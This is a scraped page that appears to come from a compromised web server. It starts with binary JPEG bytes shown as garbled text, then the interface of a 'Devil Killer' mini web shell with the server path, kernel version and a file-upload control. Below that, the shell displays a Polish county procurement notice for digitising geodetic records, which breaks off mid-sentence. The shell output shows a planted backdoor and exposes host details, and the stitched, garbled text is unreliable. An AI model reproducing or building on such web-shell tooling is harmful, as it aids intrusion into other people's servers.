JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220414/0012357301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie prac związanych z informatyzacją materiałów Powiatowego zasobu geodezyjnego i kartograficznego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Tczewski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675267</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piaskowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@powiat.tczew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">powiat.tczew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie prac związanych z informatyzacją materiałów Powiatowego zasobu geodezyjnego i kartograficznego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-35da8f44-bbea-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00123573</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00054433/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Informatyzacja materiałów Powiatowego Zasobu Geodezyjnego i Kartograficznego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_tczew <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_tczew</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">13.5<br/>Złożenie oferty następuje za pośrednictwem ”Formularza składania oferty” dostępnego na stronie<br/>dotyczącej danego postępowania:<br/>a) Szyfrowanie ofert odbywa się automatycznie przez system.<br/>b) Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie poprzez kliknięcie przycisku<br/>”ZŁÓŻ OFERTĘ” w drugim kroku i wyświetleniu komunikatu, że oferta została złożona.<br/>c) Wykonawca może, do upływu terminu do składania ofert, zmienić lub wycofać ofertę (sposób zmiany<br/>lub wycofania oferty określony został w ww. Instrukcji)<br/>d) Z uwagi na to, że złożona oferta jest zaszyfrowana nie można jej edytować w celu dokonania<br/>zmiany. Zmianę oferty należy dokonać poprzez wycofanie uprzednio złożonej oferty i złożenie nowej.<br/>e) Zmianę lub wycofanie oferty należy zrobić do upływu terminu składania ofert.<br/>f) Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać<br/>złożonej oferty.<br/>g) Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10 plików<br/>lub spakowanych folderów przy maksymalnej wielkości 150 MB.<br/>13.6 Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz<br/>Ogłoszenie nr 2022/BZP 00024651/01 z dnia 2022-01-19<br/>2022-01-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2020 r. poz. 1261), określa<br/>niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/> stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/> komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/> zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10<br/>0.,<br/> włączona obsługa JavaScript,<br/> zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/> platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/> oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016), dalej zwanego RODO, Zamawiający informuje, że:<br/>23.1 Administratorem danych osobowych, które zostaną zawarte w Formularzu ofertowym i<br/>załącznikach jest Powiat Tczewski z siedzibą w Tczewie przy ul. Piaskowej 2.<br/>23.2 Dane kontaktowe do inspektora ochrony danych (IOD) w Starostwie Powiatowym w Tczewie to:<br/>inspektor@powiat.tczew.pl lub listownie na adres urzędu wskazany powyżej.<br/>23.3 Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przeprowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie podstawowym bez negocjacji zgodnie art. 275 pkt 1 ustawy z dnia 11 września 2019 roku Prawo<br/>zamówień publicznych, zwanej dalej Ustawą oraz w celu archiwizacji na podstawie rozporządzenia<br/>Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie Instrukcji kancelaryjnej, jednolitych<br/>rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów<br/>zakładowych.<br/>23.4 Odbiorcami danych osobowych mogą być: podmioty przetwarzające – którym zlecimy czynności<br/>wymagające przetwarzania danych, np. dostawcy naszych systemów informatycznych, firmy<br/>zajmujące się archiwizacją dokumentów (aktualna lista jest dostępna u IOD) oraz podmioty<br/>upoważnione na podstawie przepisów prawa. Dane mogą być również udostępniane innym<br/>podmiotom, w przypadku i na zasadach o których mowa w art. 74 Ustawy.<br/>Zamawiający może udostępnić dane osobowe, o których mowa w art. 10 RODO, w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX Ustawy, do upływu terminu na<br/>ich wniesienie. Dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>mogą być przekazywane wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady<br/>postępowanie o udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do danych<br/>osobowych może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną<br/>prywatności lub interesem publicznym, zgodnie z art. 18 ust. 5 pkt 1 i 2 Ustawy.<br/>23.5 Dane osobowe będą przechowywane w czasie określonym przepisami prawa, w szczególności<br/>zgodnie z art. 78 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>Ogłoszenie nr 2022/BZP 00024651/01 z dnia 2022-01-19<br/>2022-01-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>trwania umowy, a następnie przez okres archiwizacji, zgodny z rozporządzeniem wymienionym w pkt.<br/>23.3 SWZ.<br/>23.6 Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienie publiczne nie<br/>jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że<br/>w zależności od przedmiotu zamówienia, zamawiający może żądać ich podania na podstawie<br/>przepisów Ustawy oraz wydanych do niej przepisów wykonawczych, a w szczególności na podstawie<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">23.7 Wykonawca ma prawo:<br/>a) dostępu do swoich danych. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust.<br/>1–3 RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu;<br/>b) ich sprostowania lub uzupełnienia – na podstawie art. 16 RODO. Zgodnie z art. 19 ust. 2 Ustawy<br/>skorzystanie z tego uprawnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą;<br/>c) żądać ograniczenia ich przetwarzania – na podstawie art. 18 ust. 1 RODO Wystąpienie z<br/>przedmiotowym żądaniem, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.<br/>23.8 Wykonawcy nie przysługuje:<br/>a) prawo do usunięcia danych osobowych – w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) prawo sprzeciwu wobec przetwarzania danych osobowych – na podstawie art. 21 RODO, gdyż<br/>podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>23.9 Dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej. Dane<br/>nie będą przetwarzane w sposób zautomatyzowany w tym również w formie profilowania.<br/>23.10 Wykonawca ma prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna, iż przetwarzanie danych osobowych jego dotyczących narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest informatyzacja analogowych materiałów Zasobu tj. operatów technicznych dla obszaru powiatu tczewskiego rozumiana jako:<br/>4.1.1	przetworzenie do postaci cyfrowej dokumentacji źródłowej wchodzącej w skład operatów technicznych, <br/>4.1.2	umieszczenie identyfikatorów zgodnych z rozporządzeniem PZGiK,<br/>4.1.3	zgromadzenie wyżej wymienionej dokumentacji z repozytorium o strukturze wskazanej przez Zamawiającego,<br/>4.1.4	implementacja cyfrowej dokumentacji do Systemu PZGiK.<br/>4.2.	Wymaga się, aby ze strony Wykonawcy pracę nadzorowały osoby posiadające uprawnienia geodezyjne określone w art. 43 pkt. 1 i 2 ustawy Prawo geodezyjne i kartograficzne oraz mające doświadczenie w pracy nad materiałami archiwalnymi.<br/>4.3.	Cele do osiągnięcia:<br/>4.3.1	Zabezpieczenie posiadanych oraz pozyskiwanych dokumentów i opracowań geodezyjnych i kartograficznych, rozumiane jako przekształcenie do postaci cyfrowej w sposób zapewniający zabezpieczenie przed utratą informacji <br/>i modyfikacją treści.<br/>4.3.2	Usprawnienie dostępu do dokumentacji geodezyjnej i kartograficznej wchodzącej w skład materiałów Zasobu, dzięki możliwości łatwego odnalezienia dokumentacji z wykorzystaniem wielu kryteriów wyszukiwania.<br/>4.3.3	Automatyzacja procesu udostępniania materiałów Zasobu.<br/>4.4.	Rodzaje materiałów Zasobu podlegających cyfryzacji.<br/>4.5.	Digitalizacji podlegać będą materiały Zasobu opisane w punkcie 4.2 i 4.3 Warunków Technicznych w zróżnicowanych formatach.<br/>4.6.	Procesowi przekształcania dokumentacji geodezyjnej i kartograficznej <br/>do postaci cyfrowej podlegają dokumenty w postaci analogowej - operaty techniczne.<br/>4.7.	Łączna liczba metrów bieżących dokumentacji podlegającej opracowaniu wynosi 60.<br/>4.8.	Dla dokumentów Zasobu należy wykonać przetworzenie do postaci cyfrowej oraz określenie zakresów.<br/>4.9.	Przeznaczona do przetworzenia dokumentacja będzie podlegała kompleksowemu opracowaniu, zgodnie z przepisami Rozporządzenia PZGiK, tj. do jednego dokumentu elektronicznego zapisanego w formacie PDF. Zamawiający wskazuje, że dla około 14 metrów bieżących dokumentacji część dokumentów, wchodzących w skład operatów technicznych, została przetworzona do postaci cyfrowej oraz nadano im numery identyfikacyjne. W takim przypadku dokumentów tych nie należy usuwać, natomiast operat należy ponownie w całości przetworzyć do postaci cyfrowej (do jednego dokumentu elektronicznego w formacie PDF) i umieścić w dokumentacji cyfrowej operatu.<br/>4.10.	W celu oszacowania pracochłonności prac objętych Warunkami Technicznymi Wykonawca winien dokonać analizy wszystkich podanych danych jako jednej zintegrowanej całości opisującej Zasób. Wnioskowanie pracochłonności całego przedsięwzięcia na podstawie wybranych a nie wszystkich parametrów może prowadzić do błędnych wyników i oszacowań, za które Zamawiający nie odpowiada. Zamawiający umożliwia potencjalnym Wykonawcom oględziny materiałów Zasobu. Wszelkie uzgodnienia pomiędzy Wykonawca i Zamawiającym będą podlegały wpisowi w dzienniku pracy. Uzgodnienia zamieszczane w dzienniku pracy powinny zostać opatrzone podpisem Wykonawcy oraz Zamawiającego.<br/>4.11.	W celu przeprowadzenia oględzin Zamawiający udostępni Wykonawcy stanowisko komputerowe oraz dokumentację analogową po wcześniejszym telefonicznym umówieniu się z Zamawiającym na okres maksymalnie 8 godzin w godzinach pracy Starostwa Powiatowego w Tczewie. Czynności związane z implementacją dokumentów elektronicznych oraz uzupełnieniem atrybutów prac i operatów w bazie danych Systemu PZGiK będą odbywały się w siedzibie Zamawiającego. Zamawiający udostępni jedno stanowisko komputerowe na okres trwania umowy wyłącznie w dniach i godzinach pracy Starostwa Powiatowego w Tczewie. Zamawiający dopuszcza zdalny dostęp do Systemu PZGiK jeśli zaproponowane przez Wykonawcę rozwiązanie zostanie zaakceptowane przez Zamawiającego.<br/>4.12.	W celu przeprowadzenia oględzin Zamawiający udostępni Wykonawcy stanowisko komputerowe oraz dokumentację analogową po wcześniejszym telefonicznym umówieniu się z Zamawiającym na okres maksymalnie 8 godzin w godzinach pracy Starostwa Powiatowego w Tczewie.<br/>4.13.	W celu realizacji zamówienia Wykonawca winien dysponować przynajmniej 1 skanerem wielkoformatowymi A0, 6 skanerami A3 oraz 1 skanerem dziełowym.<br/>4.14.	Na przedmiot zamówienia składają się prace szczegółowo opisane w Warunkach technicznych stanowiących Załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79999000-3 - Usługi skanowania i fakturowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79999100-4 - Usługi skanowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">126 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">3.8	Zamawiający informuje, że przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 Ustawy, polegających na powtórzeniu podobnych usług do zamówienia podstawowego w okresie 3 lat od dnia udzielenia zamówienia podstawowego, do wysokości 50% wartości zamówienia podstawowego.<br/>3.9	Zakres zamówień podobnych będzie tożsamy z zakresem usług w ramach zamówienia podstawowego, natomiast zamówienie zostanie udzielone – na podstawie odrębnej umowy – wyłącznie w przypadku, gdy zaistnieje potrzeba wykonania wyżej wymienionych usług oraz jeżeli Zamawiający będzie posiadał niezbędne środki finansowe. Ponadto zamówienie zostanie udzielone, jeżeli dotychczasowy Wykonawca realizuje lub zrealizował usługę należycie oraz zapewni standard wykonania usług nie gorszy od standardu wykonania zamówienia podstawowego, a ponadto zaakceptuje istotne warunki dotychczasowej umowy, z zastrzeżeniem negocjacji wynagrodzenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>6.2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>6.2.1	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.2	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.3	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.4	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 4 Ustawy jeżeli wykaże, że:<br/>1)	wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 3 (trzy) zamówienia o wartości brutto nie mniejszej niż 200 000,00 zł każde, polegające na informatyzacji materiałów państwowego zasobu geodezyjnego i kartograficznego, w tym co najmniej dwa zamówienia dotyczące informatyzacji materiałów zasobu wraz z wykonaniem zasilenia systemu informatycznego do prowadzenia Państwowego Zasobu Geodezyjnego i Kartograficznego, zeskanowanymi materiałami.<br/>2)	dysponują lub będą dysponować w całym okresie realizacji zamówienia zespołem co najmniej 5 osób, który będzie uczestniczyć w wykonaniu zamówienia, w skład którego wchodzi co najmniej jeden Specjalista ds. geodezji i kartografii, posiadający uprawnienia geodezyjne z zakresu 1,2 w rozumieniu przepisów art. 43 pkt 1 i 2 ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (t.j. Dz. U. 